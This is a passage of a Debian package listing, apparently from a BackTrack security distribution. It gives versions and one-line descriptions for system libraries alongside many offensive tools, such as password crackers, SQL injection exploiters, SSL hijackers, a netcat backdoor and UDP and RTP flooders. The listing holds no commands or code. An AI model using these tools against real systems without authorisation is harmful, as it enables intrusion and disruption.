6b20-1.9.7-0ubuntu1~10.04.1 OpenJDK Development Kit (JDK) ii openjdk-6-jre 6b20-1.9.7-0ubuntu1~10.04.1 OpenJDK Java runtime, using Hotspot JIT ii openjdk-6-jre-headless 6b20-1.9.7-0ubuntu1~10.04.1 OpenJDK Java runtime, using Hotspot JIT (headless) ii openjdk-6-jre-lib 6b20-1.9.7-0ubuntu1~10.04.1 OpenJDK Java runtime (architecture independent libraries) ii openssh-client 1:5.3p1-3ubuntu6 secure shell (SSH) client, for secure access to remote machines ii openssh-server 1:5.3p1-3ubuntu6 secure shell (SSH) server, for secure access from remote machines ii openssl 0.9.8k-7ubuntu8.6 Secure Socket Layer (SSL) binary and related cryptographic tools ii openssl-blacklist 0.5-2 list of blacklisted OpenSSL RSA keys ii openvpn 2.1.0-1ubuntu1.1 virtual private network daemon ii openvpn-blacklist 0.4 list of blacklisted OpenVPN RSA shared keys ii ophcrack 3.3.0-1 Microsoft Windows password cracker using rainbow tables (gui) ii os-prober 1.38 utility to detect other OSes on a set of drives ii osvdb 1.0-bt1 Firefox link to osvdb.org. ii p0f 2.0.8-bt0 A versatile passive OS fingerprinting tool. ii p7zip 9.04~dfsg.1-1 7zr file archiver with high compression ratio ii p7zip-full 9.04~dfsg.1-1 7z and 7za file archivers with high compression ratio ii pack 0.0.2-bt0 Password Analysis and Cracking Toolkit ii padbuster 0.3-bt1 PadBuster is a Perl script for automating Padding Oracle Attacks. ii parted 2.2-5ubuntu5.1 The GNU Parted disk partition resizing program ii pasco 1.0+20040505-5 An Internet Explorer cache forensic analysis tool ii passwd 1:4.1.4.2-1ubuntu2.2 change and administer password and group data ii patch 2.6-2ubuntu1 Apply a diff file to an original ii pbnj 2.04-bt4 PBNJ is a suite of tools to monitor changes on a network over time. It does this by checking for changes on the target machine(s), which includes the deta ii pciutils 1:3.0.0-4ubuntu17 Linux PCI Utilities ii pcscd 1.5.3-1ubuntu4.2 Middleware to access a smart card using PC/SC (daemon side) ii pdf-parser 0.3.7-bt1 This tool will parse a PDF document to identify the fundamental elements used in the analyzed file. ii pdfbook 1.0-bt0 Script to gather facebook artifacts from a pd process memory dump. ii pdfid 0.0.11-bt0 Will scan a file to look for certain PDF keywords. ii pdgmail 0.2.0-bt0 Script to gather gmail artifacts from a pd process memory dump. ii peepdf 0.1-bt1 peepdf is a Python tool to explore PDF files in order to find out if the file can be harmful or not. ii perl 5.10.1-8ubuntu2.1 Larry Wall's Practical Extraction and Report Language ii perl-base 5.10.1-8ubuntu2.1 minimal Perl system ii perl-cisco-copyconfig 1.4-bt2 Provides methods for manipulating the running-config of devices running IOS via SNMP directed TFTP. ii perl-doc 5.10.1-8ubuntu2.1 Perl documentation ii perl-modules 5.10.1-8ubuntu2.1 Core Perl modules ii perl-number-bytes-human 0.07-bt1 Perl module for stuff ii perl-tk 1:804.028-6 Perl module providing the Tk graphics library ii phonon 4:4.7.0really4.4.2- 0ubuntu1~lucid1~ppa1 metapackage for the Phonon multimedia framework ii phonon-backend-xine 4:4.7.0really4.4.2- 0ubuntu1~lucid1~ppa1 Phonon Xine 1.1.x backend ii php5 5.3.2-1ubuntu4.9 server-side, HTML-embedded scripting language (metapackage) ii php5-cli 5.3.2-1ubuntu4.9 command-line interpreter for the php5 scripting language ii php5-common 5.3.2-1ubuntu4.9 Common files for packages built from the php5 source ii php5-mysql 5.3.2-1ubuntu4.9 MySQL module for php5 ii php5-sqlite 5.3.2-1ubuntu4.9 SQLite module for php5 ii pkg-config 0.22-1build2 manage compile and link flags for libraries ii plecost 0.2.2-9beta-bt1 Wordpress finger printer tool, plecost search and retrieve information about the plugins versions installed in Wordpress systems. ii plymouth 0.8.2-2ubuntu2.2 graphical boot animation and logger - main package ii plymouth-label 0.8.2-2ubuntu2.2 graphical boot animation and logger - label control ii plymouth-theme-script 0.8.2-2ubuntu2.2 graphical boot animation and logger - script theme ii plymouth-theme-ubuntu-text 0.8.2-2ubuntu2.2 graphical boot animation and logger - ubuntu-logo theme ii plymouth-x11 0.8.2-2ubuntu2.2 graphical boot animation and logger - X11 interface ii pm-utils 1.3.0-1ubuntu3 utilities and scripts for power management ii pnm2ppa 1.13-0ubuntu1 PPM to PPA converter ii po-debconf 1.0.16 tool for managing templates file translations with gettext ii policykit-1 0.96-2ubuntu0.1 framework for managing administrative policies and privileges ii policykit-1-gnome 0.96-2ubuntu2 GNOME authentication agent for PolicyKit-1 ii poppler-utils 0.12.4-0ubuntu5.1 PDF utilitites (based on libpoppler) rc popularity-contest 1.48ubuntu1 Vote for your favourite packages automatically ii portaudio19-dev 19+svn20090620-0ubuntu2 Portable audio I/O - development files ii portmap 6.0.0-1ubuntu2.1 RPC port mapper ii powerfuzzer 1.0beta-bt1 Powerfuzzer is a highly automated and fully customizable web fuzzer (HTTP protocol based application fuzzer). ii powermgmt-base 1.31 Common utils and configs for power management ii ppp 2.4.5~git20081126t100229-0ubuntu3 Point-to-Point Protocol (PPP) - daemon ii pppconfig 2.3.18ubuntu2 A text menu based utility for configuring ppp ii pppoeconf 1.19ubuntu1 configures PPPoE/ADSL connections ii pref.pl 1.0-bt0 Parses Prefetch files ii procps 1:3.2.8-1ubuntu4 /proc file system utilities ii protos-sip r2-bt1 Evaluate implementation level security and robustness of SIP ii proxychains 3.1-bt2 a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4, SOCKS5 or HTTP(S) proxy. Support ii proxytunnel 1.9.0-bt3 Connecting outside through HTTP(S) proxies ii psfontmgr 0.11.10-4ubuntu1 PostScript font manager -- part of Defoma, Debian Font Manager ii psmisc 22.10-1 utilities that use the proc file system ii psutils 1.17-27 A collection of PostScript document handling utilities ii ptk 2.0-bt2 PTK forensics is a computer forensic framework for the command line tools in the SleuthKit plus much more software modules. ii ptunnel 0.71-bt2 Ptunnel is an application that allows you to reliably tunnel TCP connections to a remote host using ICMP echo request and reply packets, commonly known as ii pulseaudio 1:0.9.22~0.9.21+stable-queue-32- g8478-0ubuntu14.1 PulseAudio sound server ii pulseaudio-esound-compat 1:0.9.22~0.9.21+stable-queue-32- g8478-0ubuntu14.1 PulseAudio ESD compatibility layer ii pulseaudio-module-x11 1:0.9.22~0.9.21+stable-queue-32- g8478-0ubuntu14.1 X11 module for PulseAudio sound server ii pulseaudio-utils 1:0.9.22~0.9.21+stable-queue-32- g8478-0ubuntu14.1 Command line tools for the PulseAudio sound server ii pwnat 0.3beta-bt4 A tool that allows any number of clients behind NATs to communicate with a server behind a separate NAT. ii pwntcha rev4780-bt3 PWNtcha stands for "Pretend We’re Not a Turing Computer but a Human Antagonist", as well as PWN capTCHAs. This project’s goal is to demonstrate the in ii pyscard 1.6.12-bt1 pyscard is a python module adding smart cards support to python. ii pyserial 2.5-bt0 Multiplatform Serial Port Module for Python (Win32, Jython, Linux, BSD and more) ii python 2.6.5-0ubuntu1 An interactive high-level object-oriented language (default version) ii python-apport 1.13.3-0ubuntu2 apport crash report handling library ii python-apt 0.7.94.2ubuntu6.2 Python interface to libapt-pkg ii python-beautifulsoup 3.1.0.1-2build1 error-tolerant HTML parser for Python ii python-cairo 1.8.8-1 Python bindings for the Cairo vector graphics library ii python-central 0.6.15ubuntu1 register and build utility for Python packages ii python-clientform 0.2.10-2.1 module for handling HTML forms on the client side ii python-crypto 2.0.1+dfsg1-4ubuntu2 cryptographic algorithms and protocols for Python ii python-dbus 0.83.0-1ubuntu3 simple interprocess messaging system (Python interface) ii python-distutils-extra 2.18bzr1 enhancements to the Python build system ii python-dnspython 1.7.1-1ubuntu0.1 DNS toolkit for Python ii python-dpkt 1.6+svn54-1 Python packet creation / parsing module ii python-dumbnet 1.12-3 A dumb, portable networking library -- python bindings ii python-extractor 1:0.5-7 extracts meta-data from files of arbitrary type (Python bindings) ii python-fpconst 0.7.2-4 Utilities for handling IEEE 754 floating point special values ii python-gconf 2.28.0-1ubuntu1 Python bindings for the GConf configuration database system ii python-gdbm 2.6.5-0ubuntu2 GNU dbm database support for Python ii python-geoip 1.2.4-2ubuntu1 Python bindings for the GeoIP IP-to-country resolver library ii python-glade2 2.17.0-0ubuntu2 GTK+ bindings: Glade support ii python-gmenu 2.30.0-0ubuntu4 an implementation of the freedesktop menu specification for GNOME ii python-gnome2 2.28.0-1ubuntu1 Python bindings for the GNOME desktop environment ii python-gnomeapplet 2.30.0-0ubuntu1.1 Python bindings for the GNOME panel applet library ii python-gnomecanvas 2.28.0-1ubuntu1 Python bindings for gnomecanvas (debug extension) ii python-gnupginterface 0.3.2-9.1 Python interface to GnuPG (GPG) ii python-gnuplot 1.8-1.1 A Python interface to the gnuplot plotting program ii python-gobject 2.21.1-0ubuntu3 Python bindings for the GObject library ii python-gtk2 2.17.0-0ubuntu2 Python bindings for the GTK+ widget set ii python-gtksourceview2 2.10.1-0ubuntu1 Python bindings for the GtkSourceView widget ii python-httplib2 0.6.0-1 comprehensive HTTP client library written in Python ii python-imaging 1.1.7-1ubuntu0.1 Python Imaging Library ii python-imaging-tk 1.1.7-1ubuntu0.1 Python Imaging Library - ImageTk Module ii python-impacket 0.9.6.0-3 Python module to easily build and dissect network protocols ii python-iniparse 0.3.1-1 Module to access and modify configuration data in INI files ii python-launchpadlib 1.6.0-0ubuntu1 Launchpad web services client library ii python-lazr.restfulclient 0.9.11-1ubuntu1.1 client for lazr.restful-based web services ii python-lazr.uri 1.0.2-1 library for parsing, manipulating, and generating URIs ii python-libxml2 2.7.6.dfsg-1ubuntu1.1 Python bindings for the GNOME XML library ii python-lightblue 0.3.2-1ubuntu1 cross-platform Bluetooth API for Python ii python-lxml 2.2.4-1 pythonic binding for the libxml2 and libxslt libraries ii python-minimal 2.6.5-0ubuntu1 A minimal subset of the Python language (default version) ii python-netaddr 0.7.4-1 manipulation of various common network address notations ii python-newt 0.52.10-5ubuntu1 A NEWT module for Python ii python-nltk 2.0~b8-0ubuntu1 Python libraries for natural language processing ii python-notify 0.1.1-2build3 Python bindings for libnotify ii python-numpy 1:1.3.0-3build1 Numerical Python adds a fast array facility to the Python language ii python-oauth 1.0a~svn1124-0ubuntu2 implementation of the OAuth protocol ii python-openssl 0.10-1 Python wrapper around the OpenSSL library ii python-pam 0.4.2-12.1ubuntu1 A Python interface to the PAM library ii python-pcapy 0.10.6-1ubuntu2 Python interface to the libpcap packet capture library ii python-pefile 1.2.9.1-1 Portable Executable (PE) parsing module for Python ii python-pexpect 2.3-1build1 Python module for automating interactive applications ii python-pkg-resources 0.6.10-4ubuntu1 Package Discovery and Resource Access using pkg_resources ii python-problem-report 1.13.3-0ubuntu2 Python library to handle problem reports ii python-psyco 1.6-1ubuntu2 Python specializing compiler ii python-ptrace 0.6.3-bt0 Python binding of ptrace library ii python-pyasn1 0.0.8a-1 ASN.1 library for Python ii python-pybonjour 1.1.1-bt4 ybonjour provides a pure-Python interface to Apple Bonjour and compatible DNS- SD libraries (such as Avahi). ii python-pycurl 7.19.0-3 Python bindings to libcurl ii python-pydot 1.0.2-1 Python interface to Graphviz's dot ii python-pyicu 0.9-2 Python extension wrapping the ICU C++ API ii python-pymssql 1.0.2+dfsg-1 Python database access for MS SQL server and Sybase ii python-pyorbit 2.24.0-5ubuntu3 A Python language binding for the ORBit2 CORBA implementation ii python-pyparsing 1.5.2-1ubuntu1 Python parsing module ii python-pypcap 1.1.2+debian-2ubuntu1 object-oriented Python interface for libpcap ii python-pyx 0.10-1ubuntu3 Python module for generating PostScript graphics ii python-qt3 3.18.1-4ubuntu1 Qt3 bindings for Python ii python-qt4 4.7.3-1ubuntu2~lucid1~ppa3 Python bindings for Qt4 ii python-scipy 0.7.0-2ubuntu0.1 scientific tools for Python ii python-serial 2.3-1 pyserial - module encapsulating access for the serial port ii python-simplejson 2.0.9-1build1 Simple, fast, extensible JSON encoder/decoder for Python ii python-sip 4.10.2-1ubuntu1~lucid1~ppa1 Python/C++ bindings generator runtime library ii python-smartpm 1.2-5 Python library of the Smart Package Manager ii python-soappy 0.12.0-4 SOAP Support for Python ii python-support 1.0.4ubuntu1 automated rebuilding support for Python modules ii python-svn 1.7.2-2ubuntu1 A(nother) Python interface to Subversion ii python-tk 2.6.5-0ubuntu2 Tkinter - Writing Tk applications with Python ii python-twisted-bin 10.0.0-2ubuntu2 Event-based framework for internet applications ii python-twisted-core 10.0.0-2ubuntu2 Event-based framework for internet applications ii python-twisted-web 10.0.0-1 An HTTP protocol implementation together with clients and servers ii python-utidylib 0.2-3.2ubuntu2 Python wrapper for TidyLib ii python-wadllib 1.1.4-1ubuntu1 Python library for navigating WADL files ii python-wicd 1.7.0+ds1-2 wired and wireless network manager - Python module ii python-wxgtk2.8 2.8.10.1-0ubuntu1.2 wxWidgets Cross-platform C++ GUI toolkit (wxPython binding) ii python-wxversion 2.8.10.1-0ubuntu1.2 wxWidgets Cross-platform C++ GUI toolkit (wxPython version selector) ii python-xdg 0.18-1ubuntu2 Python library to access freedesktop.org standards ii python-xkit 0.4.2.2 library for the manipulation of the xorg.conf ii python-yaml 3.09-2build1 YAML parser and emitter for Python ii python-zope.interface 3.5.3-1ubuntu2 Interfaces for Python ii python2 2.7.1-bt2 Python 2.7.1 ii python2.6 2.6.5-1ubuntu6 An interactive high-level object-oriented language (version 2.6) ii python2.6-minimal 2.6.5-1ubuntu6 A minimal subset of the Python language (version 2.6) ii python3 3.1.2-0ubuntu1 An interactive high-level object-oriented language (default python3 version) ii python3-minimal 3.1.2-0ubuntu1 A minimal subset of the Python language (default python3 version) ii python3.1 3.1.2-0ubuntu3 An interactive high-level object-oriented language (version 3.1) ii python3.1-minimal 3.1.2-0ubuntu3 A minimal subset of the Python language (version 3.1) ii pyxplot 0.7.1+1-1 data plotting program producing publication-quality output ii r8187-driver 26.1010.0622.2006-bt0 Patched IEEE r8187 drivers for 2.6.38 ii radeontool 1.6.1-0ubuntu1 utility to control ATI Radeon backlight functions on laptops ii rake 0.8.7-1 a ruby build program ii rar 1:3.9.b2-1 Archiver for .rar files ii rarian-compat 0.8.1-4ubuntu1 Documentation meta-data library (compatibility tools) ii rdate 1:1.2-4build1 sets the system's date from a remote host ii rdesktop 1.6.0-2ubuntu3 RDP client for Windows NT/2000 Terminal Server ii rdoc1.8 1.8.7.249-2 Generate documentation from Ruby source files (for Ruby 1.8) ii rdoc1.9.2 1.9.2.z1-1ppa1~lucid Generate documentation from Ruby source files (for Ruby 1.9.2) ii readline-common 6.1-1 GNU readline and history libraries, common files ii readpst 0.6.41-bt0 Utility which can convert email messages to both mbox and MH mailbox formats. ii recordmydesktop 0.3.8.1+svn602-1ubuntu1 Captures audio-video data of a Linux desktop session ii recordmydesktop-bt 1.0-bt1 Launcher of RecordMyDesktop for BackTrack Report-Tools. ii recoverjpeg 2.0-bt0 A tool to recover lost files on damaged memory cards or USB drives. ii reglookup 0.12.0-bt0 RegLookup is an small command line utility for reading and querying Windows NT-based registries. ii reiserfsprogs 1:3.6.21-1build1 User-level tools for ReiserFS filesystems ii revhosts 2.0-bt3 Vhost enumeration and hackign tool ii rfidiot 1.0a-bt4 RFIDIOt is an open source python library for exploring RFID devices ii rfuzz 0.9-bt2 RFuzz is a Ruby library to easily test web applications from the outside using a fast HttpClient and wicked evil RandomGenerator allowing the average prog ii ri 4.2-2~uorppa0 Ruby Interactive reference (ri) ii ri1.8 1.8.7.249-2 Ruby Interactive reference (for Ruby 1.8) ii ri1.9.2 1.9.2.z1-1ppa1~lucid Ruby Interactive reference (for Ruby 1.9.2) ii rifiuti 1.0+20040505-4 A MS Windows recycle bin analysis tool ii rinetd 0.62-5.1 Internet TCP redirection server ii rkhunter 1.3.8-bt1 This tool scans for rootkits, backdoors and local exploits. ii rpm-common 4.7.2-1lbuild1 common files for RPM ii rrdtool 1.3.8-1ubuntu1 Time-series data storage and display system (programs) ii rsync 3.0.7-1ubuntu1.1 fast remote file copy program (like rcp) ii rsyslog 4.2.0-2ubuntu8.1 enhanced multi-threaded syslogd ii rtkit 0.6-0ubuntu1 Realtime Policy and Watchdog Daemon ii rtpbreak 1.3a-bt2 With rtpbreak you can detect, reconstruct and analyze any RTP session. ii rtpflood 1.0-bt0 Command line tool used to flood any device processing RTP. ii rtpinject 1.0-bt1 RTP (Voip) injection tool ii rtpinsertsound 3.0-bt1 RTP (Voip) securoty tool ii rtpmixsound 3.0-bt1 RTP (Voip) security tool ii ruby 4.2-2~uorppa0 An interpreter of object-oriented scripting language Ruby ii ruby-dev 4.2-2~uorppa0 Header files for compiling extension modules for Ruby ii ruby1.8 1.8.7.249-2 Interpreter of object-oriented scripting language Ruby 1.8 ii ruby1.8-dev 1.8.7.249-2 Header files for compiling extension modules for the Ruby 1.8 ii ruby1.9.2 1.9.2.z1-1ppa1~lucid Interpreter of object-oriented scripting language Ruby 1.9.2 ii ruby1.9.2-dev 1.9.2.z1-1ppa1~lucid Header files for compiling extension modules for the Ruby 1.9.2 ii rubygems 1.3.7-1~uorppa0 package management framework for Ruby libraries/applications ii rubygems1.8 1.3.7-1~uorppa0 package management framework for Ruby libraries/applications ii rubygems1.9.2 1.3.7-1~uorppa0 package management framework for Ruby libraries/applications ii safecopy 1.6-bt0 A data recovery tool which tries to extract as much data as possible from a problematic source. ii samba-common 2:3.4.7~dfsg-1ubuntu3.6 common files used by both the Samba server and client ii samba-common-bin 2:3.4.7~dfsg-1ubuntu3.6 common files used by both the Samba server and client ii samdump 1.0-bt0 Extracts a Samba-style smbpasswd file directly from an offline copy of the SAM. ii samdump2 1.1.1-1 Dump Windows 2k/NT/XP password hashes ii sapyto 0.99-bt0 SAP Penetration Testing Framework ii sbd 1.37-bt1 Secure Backdoor Netcat clone ii scalpel 2.0-bt2 A fast file carver that reads a database of header and footer definitions and extracts matching files or data fragments from a set of image files or raw d ii scapy 2.1.0-bt1 Scapy is a powerful packet manipulation tool and supports multiple protocols. ii screen 4.0.3-14ubuntu1.2 terminal multiplexor with VT100/ANSI terminal emulation ii screen-resolution-extra 0.13 Extension for the GNOME screen resolution applet ii scrollkeeper 0.8.1-4ubuntu1 Transitional package for scrollkeeper ii scrounge-ntfs 0.9-bt0 A data recovery program for NTFS filesystems. ii sctpscan 12.0-bt2 SCTPscan can scan networks for SCTP aware machines and open ports. ii securityfocus 1.0-bt1 Firefox link to SecurityFocus.com. ii sed 4.2.1-6 The GNU sed stream editor ii sensible-utils 0.0.1ubuntu3 Utilities for sensible alternative selection ii set 1.3.5-bt4 The Social-Engineer Toolkit (SET) is an open source, python driven tool for penetration testers. ii sfuzz 0.7.0alpha-bt2 simple fuzz is exactly what it sounds like - a simple fuzzer. don't mistake simple with a lack of fuzz capability. this fuzzer has two network modes of op ii sgml-base 1.26 SGML infrastructure and SGML catalog file support ii sgml-data 2.0.4 common SGML and XML data ii shared-mime-info 0.71-1ubuntu2 FreeDesktop.org shared MIME database and spec ii sharutils 1:4.6.3-4 shar, unshar, uuencode, uudecode ii shodan 1.0-bt2 Firefox link to ShodanHQ.com. ii sickfuzz 0.3-bt0 A fuzzer made out of several custom .spk files. ii siege 2.70-bt1 Siege is an http load testing and benchmarking utility. ii sipcrack 0.3-bt2 SIPcrack is a suite for sniffing and cracking the digest authentification used in the SIP protocol ii sipp 3.2-bt0 SIPp is a free Open Source test tool, traffic generator for the SIP protocol ii sipsak 0.9.6-bt0 A small command line tool for developers and administrators of Session Initiation Protocol (SIP) applications. ii sipscan 0.1-bt1 A fast network scanner for UDP-SIP clients. ii sipvicious 0.2.6-bt0 SIPVicious suite is a set of tools that can be used to audit SIP based VoIP systems. ii skipfish 2.00-bt0 A fully automated, active web application security reconnaissance tool. ii sleuthkit 3.2.1-bt0 The Sleuth Kit (TSK) is a C library and a collection of command line tools. Autopsy is a graphical interface to TSK. TSK can be integrated into automated ii smap 0.6.0-bt0 A simple scanner for SIP enabled devices. ii smbclient 2:3.4.7~dfsg-1ubuntu3.6 command-line SMB/CIFS clients for Unix ii smistrip 0.4.8+dfsg2-2 extract MIB from text files like RFC ii smtp-user-enum 1.2-bt0 Username guessing tool primarily for use against the default Solaris SMTP service ii smtprc 2.0.3-bt0 A network open mail relay checker. ii smtpscan 0.5-bt0 A tool to guess which MTA is used by sending several "special" SMTP requests. ii sniffjoke 0.4.1-bt1 SniffJoke is an application for Linux that handle transparently your TCP connection, delaying, modifyng and inject fake packets inside your transmission, ii snmp 5.4.2.1~dfsg0ubuntu1-0ubuntu2.1 SNMP (Simple Network Management Protocol) applications ii snmp-mibs-downloader 1.0 Install and manage Management Information Base (MIB) files ii snmpcheck 1.8-bt2 Like to snmpwalk, snmpcheck permits to enumerate information via SNMP protocol. ii snmpenum 1.0-bt2 Simple Perl script to enumerate information on Machines that are running SNMP ii snort 2.8.5.2-2build1 flexible Network Intrusion Detection System ii snort-common 2.8.5.2-2build1 flexible Network Intrusion Detection System [common files] ii snort-common-libraries 2.8.5.2-2build1 flexible Network Intrusion Detection System ruleset ii snort-rules-default 2.8.5.2-2build1 flexible Network Intrusion Detection System ruleset ii socat 1.7.1.3-bt2 socat is a relay for bidirectional data transfer between two independent data channels. Each of these data channels may be a file, pipe, device (serial li ii sox 14.3.0-1.1build1 Swiss army knife of sound processing ii spamhole 0.4-bt0 spamhole is a fake sopen SMTP relay, intended to stop (some) spam by convincing spammers that it is delivering spam messages for them, when in fact it is ii spike 2.9-bt5 A powerful network fuzzer. ii sqlbrute 1.0-bt3 Multi-threaded blind SQL injection bruteforcer. ii sqlite 2.8.17-6build2 command line interface for SQLite ii sqlite3 3.6.22-1 A command line interface for SQLite 3 ii sqlmap 0.9-bt2 sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of back-end d ii sqlninja 0.2.6-bt0 Sqlninja is a tool targeted to exploit SQL Injection vulnerabilities on a web application that uses Microsoft SQL Server. ii squashfs-tools 1:4.0-6ubuntu1 Tool to create and append to squashfs filesystems ii ssidsniff 0.53-bt2 A curses based tool that allows identification, classification and data capturing of wireless networks. The interface is inspired by the unix top(1) utili ii ssl-cert 1.0.23ubuntu2 simple debconf wrapper for OpenSSL ii ssldump 0.9b3-bt0 An SSLv3/TLS network protocol analyzer. ii sslh 1.8rc4-bt0 Lets one accept both HTTPS and SSH connections on the same port. ii sslscan 1.8.2-bt2 SSLScan determines what ciphers are supported on SSL-based services, such as HTTPS. Furthermore, SSLScan will determine the prefered ciphers of the SSL se ii sslsniff 0.7-bt0 Designed to MITM all SSL connections on a LAN and dynamically generate certs. ii sslstrip 0.8-bt0 Transparently hijacks HTTP traffic on a network. ii stegdetect 0.6-bt0 Stegdetect is an automated tool for detecting steganographic content in images. It is capable of detecting several different steganographic methods to emb ii strace 4.5.19-2 A system call tracer ii stunnel4 4.35-bt2 The stunnel program is designed to work as an SSL encryption wrapper between remote client and local (inetd-startable) or remote servers. The goal is to f ii subversion 1.6.6dfsg-2ubuntu1.2 Advanced version control system ii sudo 1.7.2p1-1ubuntu5.3 Provide limited super user privileges to specific users ii swaks 20100211-bt0 A flexible, scriptable, transaction-oriented SMTP test tool. ii swig 1.3.40-2ubuntu1 Generate scripting interfaces to C/C++ code ii syslinux 2:3.63+dfsg-2ubuntu3 Bootloader for Linux/i386 using MS-DOS floppies ii sysv-rc 2.87dsf-4ubuntu17.2 System-V-like runlevel change mechanism ii sysv-rc-conf 0.99-6 SysV init runlevel configuration tool for the terminal ii sysvinit-utils 2.87dsf-4ubuntu17.2 System-V-like utilities ii tar 1.22-2ubuntu1 GNU version of the tar archiving utility ii tasksel 2.73ubuntu26 Tool for selecting tasks for installation on Debian systems ii tasksel-data 2.73ubuntu26 Official tasks used for installation of Debian systems rc tcl8.4 8.4.19-4 Tcl (the Tool Command Language) v8.4 - run-time files ii tcl8.5 8.5.8-2 Tcl (the Tool Command Language) v8.5 - run-time files ii tcpd 7.6.q-18 Wietse Venema's TCP wrapper utilities ii tcpdump 4.1.1-bt6 A powerful command-line packet analyzer. ii tcpflow 0.21.ds1-6 TCP flow recorder ii tcpreplay 3.4.4-bt0 Tcpreplay is a suite written by Aaron Turner for UNIX operating systems which gives you the ability to use previously captured traffic in libpcap format ii tcptraceroute 1.5beta7-bt3 tcptraceroute is a traceroute implementation using TCP packets. ii tcpxtract 1.0.1-5 extracts files from network traffic based on file signatures ii telnet 0.17-36build1 The telnet client ii testdisk 6.11.3-bt0 Powerful free data recovery software. ii testssl.sh 1.13-bt1 testssl.sh is a Unix command line tool which checks for the support of weak and medium (i.e. also weak) SSL ciphers and the old SSL version 2. ii tex-common 2.06ubuntu0.1 common infrastructure for building and installing TeX ii texlive-base 2009-7 TeX Live: Essential programs and files ii texlive-binaries 2009-5ubuntu0.2 Binaries for TeX Live ii texlive-common 2009-7 TeX Live: Base component ii texlive-doc-base 2009-2 TeX Live: TeX Live documentation ii texlive-latex-base 2009-7 TeX Live: Basic LaTeX packages ii texlive-latex-base-doc 2009-7 TeX Live: Documentation files for texlive-latex-base ii texlive-luatex 2009-7 TeX Live: LuaTeX packages ii thc-ipv6 1.4-bt1 A complete tool set to attack the inherent protocol weaknesses of IPV6. ii thc-pptp-bruter 0.1.4-bt0 Brute force program against pptp vpn endpoints (tcp port 1723). ii thcsslcheck 0.1-bt2 Windows tool that checks the remote ssl stack for supported ciphers and version. ii theharvester 2.0-bt1 theHarvester is a tool for gathering e-mail accounts and subdomain names from different public sources. ii time 1.7-23build1 The GNU time program for measuring cpu resource usage ii tinyproxy 1.8.2-bt1 Tinyproxy is a light-weight HTTP proxy daemon for POSIX operating systems. Designed from the ground up to be fast and yet small, it is an ideal solution f rc tk8.4 8.4.19-4 Tk toolkit for Tcl and X11, v8.4 - run-time files ii tk8.5 8.5.8-1 Tk toolkit for Tcl and X11, v8.5 - run-time files ii tofrodos 1.7.8.debian.1-2 Converts DOS <-> Unix text files, alias tofromdos ii traceroute 2.0.13-bt2 This is a new modern implementation of traceroute(8) utility for Linux systems. ii truecrypt 7.0-bt4 open-source disk encryption software ii tsconf 1.0-7build1 touch screen library common files ii ttf-dejavu 2.30-2 Metapackage to pull in ttf-dejavu-core and ttf-dejavu-extra ii ttf-dejavu-core 2.30-2 Vera font family derivate with additional characters ii ttf-dejavu-extra 2.30-2 Vera font family derivate with additional characters ii ttf-droid 1.00~b112+dfsg+1-0ubuntu1 handheld device font with extensive style and language support ii ttf-dustin 20030517-7 Various TrueType fonts from dustismo.com ii ttf-freefont 20090104-5 Freefont Serif, Sans and Mono Truetype fonts ii ttf-liberation 1.05.2.20091019-4 Fonts with the same metrics as Times, Arial and Courier ii ttf-mscorefonts-installer 3.2ubuntu0.1 Installer for Microsoft TrueType core fonts ii ttf-symbol-replacement 1.2.2-0ubuntu2~lucid1 Free font with the same metrics as Symbol ii ttf-umefont 411-1 Japanese TrueType font, Ume-font ii ttf-unfonts-core 1.0.1-7ubuntu1 Un series Korean TrueType fonts ii tzdata 2011g-0ubuntu0.10.04 time zone and daylight-saving time data ii tzdata-java 2011g-0ubuntu0.10.04 time zone and daylight-saving time data for use by java runtimes ii ua-tester 1.06-bt2 his tool is designed to automatically check a given URL using a list of standard and non-standard User Agent strings provided by the user (1 per line). ii ubuntu-keyring 2010.11.09 GnuPG keys of the Ubuntu archive ii ubuntu-serverguide 10.04.3 The Ubuntu Server Guide ii ubuntu-system-service 0.1.20.1 Dbus service to set various system-wide configurations ii ucf 3.0025 Update Configuration File: preserve user changes to config files. ii udev 151-12.3 rule-based device node and kernel event manager ii udisks 1.0.1-1ubuntu1 abstraction for enumerating block devices ii udp.pl 1.0-bt2 UDP flooder. ii udptunnel r16-bt2 Tunnels TCP over UDP packets. ii ufw 0.30pre1-0ubuntu2 program for managing a Netfilter firewall ii unetbootin-bt 1.0-bt0 UNetbootin allows you to create bootable Live USB drives for Ubuntu, Fedora, and other Linux distributions without burning a CD. ii untidy beta2-bt1 untidy is general purpose XML Fuzzer. ii unzip 6.0-1build1 De-archiver for .zip files ii update-inetd 4.35ubuntu0.1 inetd configuration file updater ii update-manager-core 1:0.134.11 manage release upgrades ii update-notifier-common 0.99.3 Files shared between update-notifier and adept ii upower 0.9.1-1 abstraction for power management ii upstart 0.6.5-8 event-based init daemon ii ureadahead 0.100.0-4.1.3 Read required files in advance ii usbmuxd 1.0.2-1ubuntu2 USB multiplexor daemon for iPhone and iPod Touch devices ii usbutils 0.86-2ubuntu1 Linux USB utilities ii user-setup 1.28ubuntu7 Set up initial user and password ii util-linux 2.17.2-0ubuntu1.10.04.2 Miscellaneous system utilities ii uuid-runtime 2.17.2-0ubuntu1.10.04.2 runtime components for the Universally Unique ID library ii v86d 0.1.9-1ubuntu1 daemon to run x86 code in an emulated environment ii vbetool 1.1-2 run real-mode video BIOS code to alter hardware state ii videojak 2.00-bt3 VideoJak is an IP Video security assessment tool that can simulate a proof of concept video interception or replay test. ii vim 2:7.2.330-1ubuntu3 Vi IMproved - enhanced vi editor ii vim-common 2:7.2.330-1ubuntu3 Vi IMproved - Common files ii vim-runtime 2:7.2.330-1ubuntu3 Vi IMproved - Runtime files ii vim-tiny 2:7.2.330-1ubuntu3 Vi IMproved - enhanced vi editor - compact version ii vinetto 0.7-bt2 Vinetto is a forensics tool to examine Thumbs.db files. ii vlan 1.9-3ubuntu3 user mode programs to enable VLANs on your ethernet devices ii voiper 0.07-bt3 VoIPER is a security toolkit that aims to allow developers and security researchers to easily, extensively and automatically test VoIP devices for securit ii voiphopper 1.0-bt0 VoIP Hopper is a GPLv3 licensed security tool, written in C, that rapidly runs a VLAN Hop into the Voice VLAN on specific Ethernet switches. VoIP Hopper d ii voipong 2.0-bt1 utility which detects all Voice Over IP calls on a pipeline ii volatility 1.3-bt1 A completely open collection of tools, implemented in Python under the GNU General Public License, for the extraction of digital artifacts from volatile m ii w3af 1.0-rc5-bt2 w3af is a Web Application Attack and Audit Framework. The project's goal is to create a framework to find and exploit web application 